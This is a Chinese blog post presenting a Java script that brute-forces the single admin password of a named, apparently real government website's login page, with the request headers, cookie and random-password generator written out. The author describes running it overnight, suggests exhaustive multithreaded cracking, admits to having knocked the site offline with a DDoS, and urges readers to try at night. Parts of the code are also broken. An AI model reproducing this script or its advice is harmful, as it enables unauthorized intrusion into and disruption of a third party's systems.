网站安全-java实现小型网站登录破解攻略

最新推荐文章于 2024-07-16 06:54:32 发布
最新推荐文章于 2024-07-16 06:54:32 发布
阅读量1k 收藏 1
点赞数
文章标签: java 操作系统 网络

周末闲来无事,尝试通过java语言和相关工具实现对于一些安全级别比较低的网站进行后台管理员密码的破解。说是属于攻击,还没那么牛逼,采用这种方式尝试登陆,一个晚上没有关机,生产的随机密码4-6位,为缩小范围,只假定密码设置全为小写字母组成,采用随机生产密码尝试登陆,一个晚上没有成功,第二天起来还在跑。如下是大概需要知道的工具盒步骤及相关Java脚本。

1、web端拦截工具,fiddler,当然也可以使用其它类似的拦截工具,或者浏览器插件



根据服务器响应的头信息可以看到返回响应码200,返回的是一个Javascript重定向,o=2的返回参数大概就是提示密码错误的信息,如下:


之所以选择这个网站,也是无意中看到,其安全性能令人担忧,不但只有一个密码登陆后台,而且那个入口直接爆了,没有用户密码以及验证码等安全措施,观察网站的整体结构,采用asp相关技术,租用服务器,没有做先关安全性保障,用此继续做先关实验吧。

其实浏览器进行HTTP万维网的服务器页面或获取服务,不管采用什么技术、服务器或者中间件,在最上层,也就是应用程序HTTP,外面TCP/IP进行封装和传输,HTTP是无状态应用层协议,所以对于常见的Dos攻击服务器端基本是无能为力,现在基本呢采用的技术就是采用一些中间服务器或者代理服务器在服务端进行软件层面的控制。但是,对于上面的但密码登录做法,开发的那个人基本是脑子进水的那种。


2、java模拟http访问

不管什么语言,只要是有网络功能的,可以socket编程,模拟浏览器行为惊喜访问都是很简单。这里也不从底层写代码,开源嘛,直接该用就用commons-httpclient(网上哪里都有的一个jar包)。相关脚本如下:

/**
 * 
 */
package com.dtsz.model.util.test;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.util.Random;

import junit.framework.TestCase;

import org.apache.commons.httpclient.Header;
import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpException;
import org.apache.commons.httpclient.HttpStatus;
import org.apache.commons.httpclient.NameValuePair;
import org.apache.commons.httpclient.methods.PostMethod;
import org.junit.Test;

/**
 * 测试客户端请求,文件压缩等功能是否有效
 * 
 * @author xiaoli
 * 
 */
public class HttpGzipTest extends TestCase {

	
	/**
	 * 简单一个破解网站单独密码,当前测试网站  POST http://www.gqxnc.gov.cn/login.asp
	 * @throws IOException 
	 * @throws HttpException 
	 * 
	 */
	@Test
	public void testDDOSCrackPassword() throws HttpException, IOException {
		
		String passWord = "";
		
		String url = "http://www.gqxnc.gov.cn/pd_mima.asp";

		HttpClient httpClient = new HttpClient();
		
		PostMethod postMethod = new PostMethod(url);
		postMethod.setRequestHeader("User-Agent", "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)");
		postMethod.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
		postMethod.setRequestHeader("Referer","http://www.gqxnc.gov.cn/login.asp");
		postMethod.setRequestHeader("Host","www.gqxnc.gov.cn");
		postMethod.setRequestHeader("Cookie","ASPSESSIONIDCQCDSQAD=CJDPKHNDAHFPDBJJKPMFICBG");
		postMethod.setRequestHeader("Connection"," Keep-Alive");
		
		
		
		//String [] allPass = getRandomPassword(2, 7, 1000);
		
		do{ 
			String pass = getRandomPassword2();
			
			System.out.println(pass); 
			// 填入各个表单域的值
			NameValuePair[] data = { new NameValuePair("pass", pass), new NameValuePair("Submit", "提交") };
			// 将表单的值放入postMethod中
			//postMethod.setRequestBody(data);
			// 执行postMethod
			int statusCode = httpClient.executeMethod(postMethod);
			
			//System.out.println(" status code:" + statusCode);
			// HttpClient对于要求接受后继服务的请求,象POST和PUT等不能自动处理转发

			if (statusCode == HttpStatus.SC_OK) {
				StringBuffer contentBuffer = new StringBuffer();
				InputStream in = postMethod.getResponseBodyAsStream();
				BufferedReader reader = new BufferedReader(new InputStreamReader(in,
						postMethod.getResponseCharSet()));
				String inputLine = null;
				while ((inputLine = reader.readLine()) != null) {
					contentBuffer.append(inputLine);
					//System.out.println("input line:" + inputLine);
					if(inputLine.indexOf("login.asp?o=2") == -1){
						passWord = pass;
						System.out.println("密码匹配成功:"+passWord); 
					}
					contentBuffer.append("/n");
				}
				in.close();

			} else if (statusCode == HttpStatus.SC_MOVED_PERMANENTLY
					|| statusCode == HttpStatus.SC_MOVED_TEMPORARILY) {
				// 从头中取出转向的地址
				Header locationHeader = postMethod.getResponseHeader("location");
				String location = null;
				if (locationHeader != null) {
					location = locationHeader.getValue();
					System.out.println("The page was redirected to:" + location);
				} else {
					System.err.println("Location field value is null.");
				}
			}
			
		}while(passWord.length()<=00);
			
		System.out.println("没有匹配成功!!");
		
	}
	
	
	public String[] getRandomPassword(int type,int passLength, int count){
		char[] chars = { '0', '1', '2', '3', '4', '5', '6', '7',
		     '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k',
		     'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x',
		     'y', 'z', 'A', 'B','C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L',
		     'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
		     'Z'};    //62个字符集
		//,'!','@','#','$','%','^','&','*','~','|'
		
		String[] passwords = new String[count]
	    Random random = new Random();
	    if(type==1){
		     for (int i = 0; i < count; i++) {
		      StringBuilder password = new StringBuilder("");
		      for (int m = 1; m <= passLength; m++) {
		       password.append(chars[random.nextInt(10)]);
		      }
		      passwords[i] = password.toString();
		     }
	    }
	    else if(type==2){
		     for (int i = 0; i < count; i++) {
		      StringBuilder password = new StringBuilder("");
		      for (int m = 1; m <= passLength; m++) {
		       password.append(chars[random.nextInt(26)+10]);
		      }
		      passwords[i] = password.toString();
		     }
	    }
	    else if(type==3){
		     for (int i = 0; i < count; i++) {
		      StringBuilder password = new StringBuilder("");
		      for (int m = 1; m <= passLength; m++) {

		       password.append(chars[random.nextInt(62)]);
		      }
		      passwords[i] = password.toString();
		     }
	    }
	    else{
	     System.out.println("输入错误!");
	    }
	    return passwords;
	   }
	
	public String getRandomPassword2(){
//		char[] chars = { '0', '1', '2', '3', '4', '5', '6', '7',
//		     '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k',
//		     'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x',
//		     'y', 'z', 'A', 'B','C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L',
//		     'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
//		     'Z'};    //62个字符集
		
		char[] chars = { 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k',
			     'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x',
			     'y', 'z'};    //26个字符集
		//,'!','@','#','$','%','^','&','*','~','|'
		Random random1 = new Random();
		int count = random1.nextInt(6)+4;
		
		String rpasswords = "";
    	Random random = new Random();
	    for (int i = 0; i < count; i++) {
	      StringBuilder password = new StringBuilder("")
	      for (int m = 1; m <= count; m++) {
	       password.append(chars[random.nextInt(26)]);
	      }
	      rpasswords = password.toString();
	    }
	    return rpasswords;
	   }


}

相关的header头信息使用上面的相关工具直接获取填进去就可以。


基本思路大概没错,虽然缩小范围只在小写字母内拼密码串进行登录操作,但是使用的随机方式,26六选4-10个,比中奖还难,虽然计算机比较快,一个晚上的尝试,也没有匹配到正确密码,可能它里设置的唯一密码还包括数字和大写字母之类吧。


不过有时间可以写一个完全遍历的串的密码生产算法,多开几个线程进程,总有机会匹配到的。


3、说明:

写这篇博客和使用这个网站来做例子有以下几个目的:

(1)、记得前一个版本用jsp和Java相关技术做的是我们在学校的工作小组完成,比现在换用asp做的至少安全性、可用性好多了,换了实在可惜

(2)、网站安全性当前在互联网中比较重要,一些政府机构做的有点滥竽充数的味道

(3)、希望从这一点告诫看到的同志们,做东西没那么随便,多考虑点东西进去。


注:各位要玩的话,最好在晚上进行吧,之前采用ddos攻击直接把这个网站的服务弄停了,也是在夜深人静的和时候,怎么说,程序员要操守职业道德。




iteye_1287
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小型教育网站的开发与建设-总体设计(三)
jiankang66的博客
11-15 4552
一、本科计算机专业毕业设计论文写作指南系列文章 小型教育网站的开发与建设-开篇(一) 第三章 总体设计 3.1目的要求 该项目致力于构建一个高质量的在线教育平台,需要满足不同角色的登陆,注册,在登陆,注册时要保证唯一性,账户不可重复,同时需要根据不同角色显示不同的首页,进行不同的操作,比如学生用户不可以制作课程发布,教员不可以审核课程等。 同时也要满足密码数据的安全,不能让黑客截住用户的密码,泄露课程数据等,对于教员上传的课程不能一段时间后丢失了。 要满足界面美观,优雅,同时支持电脑,.
基于Java Web的在线考试系统的实现
QQ_1329053518的博客
05-04 2919
摘 要 随着互联网的发展,教育的方式逐渐步入信息化、智能化,网络教育逐渐成为教育未来发展的重要趋势,在线考试系统成为教育成果考察的主流方向。在线考试充分利用现代信息化技术的优势,使考试更方便、更高效。 根据中国现阶段网络的发展状况,设计一个基于Java Web的在线考试管理系统,系统面使用B/S架构设计开发,视图层面使用Vue架构技术,服务端使用SSMP架构搭建设计,数据管理技术方面则使用MySQL数据库系统进行设计,该软件系统将部署于Tomcat服务器中,以保障在线考试体系的正常工作。 该系统利
Java破解网站密码
10-25
多线程破解网站密码,适用于无任何保护措施的网站,如很多学校的教务系统。 需要txt的用户名文件和txt的字典文件,暴力破解。本源码仅供交流学习用。 适用说明: 先用火狐的firebug截取网站登录页面的post消息,将用户名和密码部分取出来,整个消息就被截取成三段,分别填入信息段一,信息段二,信息段三。
java + selenium无头浏览器使用及网站破解、逆向步骤
solinyi的博客
08-12 1038
网站破解方法(三种) 说实在的,其实就是一种方法嘛 第一种:找到登录触发或者加密入口,直接在console控制台,直接执行这个函数把响应的参数传进去。 第二种:同上找出对应签名加密的方法,把对应的JS抽取出来,封装一个入口函数。 第三种:直接把混淆的JS全部按照自己的java、python代码写出来,整合到自己的爬虫项目中 利用JAVA的JS引擎去执行js代码(适用于没有浏览器对象的如Window等) 伪代码 ScriptEngineManager scriptEngineManager = new S
验证码绕过暴力破解
最新发布
若谷的博客
07-16 1697
本实验中我们针对网站中的登录页面进行暴力破解,通过使用 Burpsuite 工具对网页进行暴力破解,体会学习暴力破解的基本过程,以及学习如何使用Burpsuite 工具。
模拟登录系列3-java模拟登录网站-验证码破解
qq_30515213的博客
11-15 1495
需求:每日会在指定文件夹下生成一个excl文件,系统需要定时读取该文件,根据这个生成文件的数据去匹配填充指定excl模板数据,excl模板文件每天也需要从指定网站下载,并完成上传到指定网站; 本文继上次百度开发者接口图文识别,来实现模拟登录网站;为后续自动化下载数据(爬虫),自动上传数据(数据自动报送)功能做准备。本文不在叙述百度开发者中心接口调用过程,如果有不懂可以查看我的前面文章;本文主要实...
黑科技知识:需要登录才能访问的网站如何破解?仅仅只需 3 步!
热门推荐
致力于C语言C++知识分享!
01-27 2万+
不少的网站(其实主要是那种1024类,当然也有一些小众专业类)是禁止未登陆用户访问的。但它会对搜索引擎开绿灯,为什么呢? 因为由搜索引擎带来的SEO关键词流量是非常可观的,当你找到这样的网站,不得不用它时,只能按照网站的要求注册账号甚至交一定的会员费。 言归正传,今天介绍的一项黑科技、骚操作就是使用浏览器自带的功能,用身份欺骗绕过网站的访问权限限制,进而直接访问网站内容。 简单来说就是网站禁止你未登陆用户访问,你用这项黑科技来破解它。 核心操作就是把浏览器的User Agent设置为搜索引擎的爬
javascript逆向入门级别实战--某小网站登录密码加密分析
没有简介就是简介
10-19 2180
本教程 网站 aHR0cCUzQS8vd3d3LnBpZ2FpLm9yZy8= 抓包分析 按F12打开浏览器开发者工具,选到network,准备抓包工作。 输入账号密码,点击登录,分析数据包 找到登录发送的数据包index.php?a=login 和里面的加密参数password_encrypt 找加密函数,登录请求不是xhr,所以我们可以通过查看元素绑定的事件监听来入手。 点击查看click监听事件的js代码,跳转到login这个函数。 大致阅读一下,找到比较可疑的地方 然后我们在$(
使用cookie实现统计访问者登陆次数
12-18
- **Java监听器**:Java的事件监听器可用于实时监控用户活动,实现在线人数统计。 - **Android计步器**:Android提供了计步监听器,用于精确地跟踪用户的步数。 总的来说,Cookie是Web开发中常见的技术,用于在...
利用JSP、Svelet技术实现小型物流网站系统
05-16
综上所述,这个"利用JSP、Servlet技术实现小型物流网站系统"是一个典型的Java Web应用实例,它涵盖了Web开发的基本元素,如前后端分离、数据处理、用户交互以及安全性考虑。通过学习和实践这样的系统,开发者可以...
jsp+Servlet实现简单的登陆
04-06
在IT行业中,Web开发是至关重要的领域,而Java平台上的Servlet和JSP(JavaServer Pages)是构建动态网站的常用技术。本示例探讨的是如何使用这两种技术来实现一个简单的登录功能,这是一个基础但关键的功能,对于...
Java破解验证码
02-21
具体步骤: 1、访问验证码链接保存图片 2、去除干扰线 3、把图片分割,保存素材 3、图片匹配() 比较图片相似: 1、把图片转换成二进制码,进行比较。计算相似度(BMPLoader)。匹配的值太多,准确率差。这个就只适用简单的验证码 2、通过DCT计算,比较图片相似度。r=0完全相似(PHash)。匹配的值太多,准确率差。这个就只适用简单的验证码 3、比较MD5值 判断图片是否相似,这个就要图片完全一样。这样不管素材多少都不可能完全一样,行不通(FileDigest) 4、均值哈希实现图像比较(FingerPrint),素材越多,成功率越高。
CTF多功能密码破解(需java环境)
02-09
CTF的小工具,实用方便,可支持多种古典密码,多种编码方式。
python小网站开发实录(二):熟悉django流程及实现登录部分功能
恭喜恭喜
03-17 198
写了半天觉得跟人家的一模一样还不如人家的详细,直接把人家的放上来吧。。毕竟本来就是按照人家的流程做的。 https://www.cnblogs.com/Leo_wl/p/5824541.html ...
python3实现小型网页用户名密码暴力破解
01-14 1043
python3实现小型网页用户名密码暴力破解 代码如下 import requests import itertools as its #包含所有密码 words = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$%&'( )*+,-./:;<=>?@[]^_`{|}~" url = "http://192.168.1.152/user/login" header = { 'User-A
强智教务JAVA/PHP模拟登录 密码JavaScript脚本encodeInp()加密算法破解
陈万洲的专栏
06-09 3044
一:背景 在模拟登录强智教务系统时,遇到了用户名和密码被JS进行加密提交的问题,加密JavaScript代码如下: function submitForm1() { try { var xh = document.getElementById("userAccount").value; var pwd = document.getElem...
实例讲解:全程追踪入侵JSP网站服务器
菜菜鸟_黑马的专栏
02-15 514
在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服务器能够比其他网站的服务器器更加安全吗?前段时间,应朋友之邀,我对他们托管的三台服务器的主机进行了测试,发现了JSP网站存在的几个问题。  入侵测试第一步:扫描  扫描是入侵的第一步,它可以让你对即将入侵的目标有一个全面的了解。同时扫描
全程追踪入侵JSP网站服务器
菜菜鸟_黑马的专栏
08-25 465
在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服务器能够比其他网站的服务器器更加安全吗?前段时间,应朋友之邀,我对他们托管的三台服务器的主机进行了测试,发现了JSP网站存在的几个问题。  入侵测试第一步:扫描  扫描是入侵的第一步,它可以让你对即将入侵的目标有一个全面的了解。同时扫描还有可能发现扫描对象的漏洞,
暴力破解网页
weixin_67879598的博客
05-15 1492
输入地址进入页面 http://110.40.154.100:8000  2.在网址后边输入authenticate  3.返回用户名admin之后,进入登陆页面进行暴力破解  密码破解成功  3.下一步进入登陆界面,输入爆破好的密码即可进入 ...
基于JAVA的个人交友网站系统设计与实现
通过对个人交友网站的设计和实现,管理员可以利用网络对个人交友网站信息进行管理,设计的网站保证信息的完整安全,这样才能提高工作效率,保证系统安全。 本论文的主要目的是设计和实现一个基于JAVA语言的个人...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值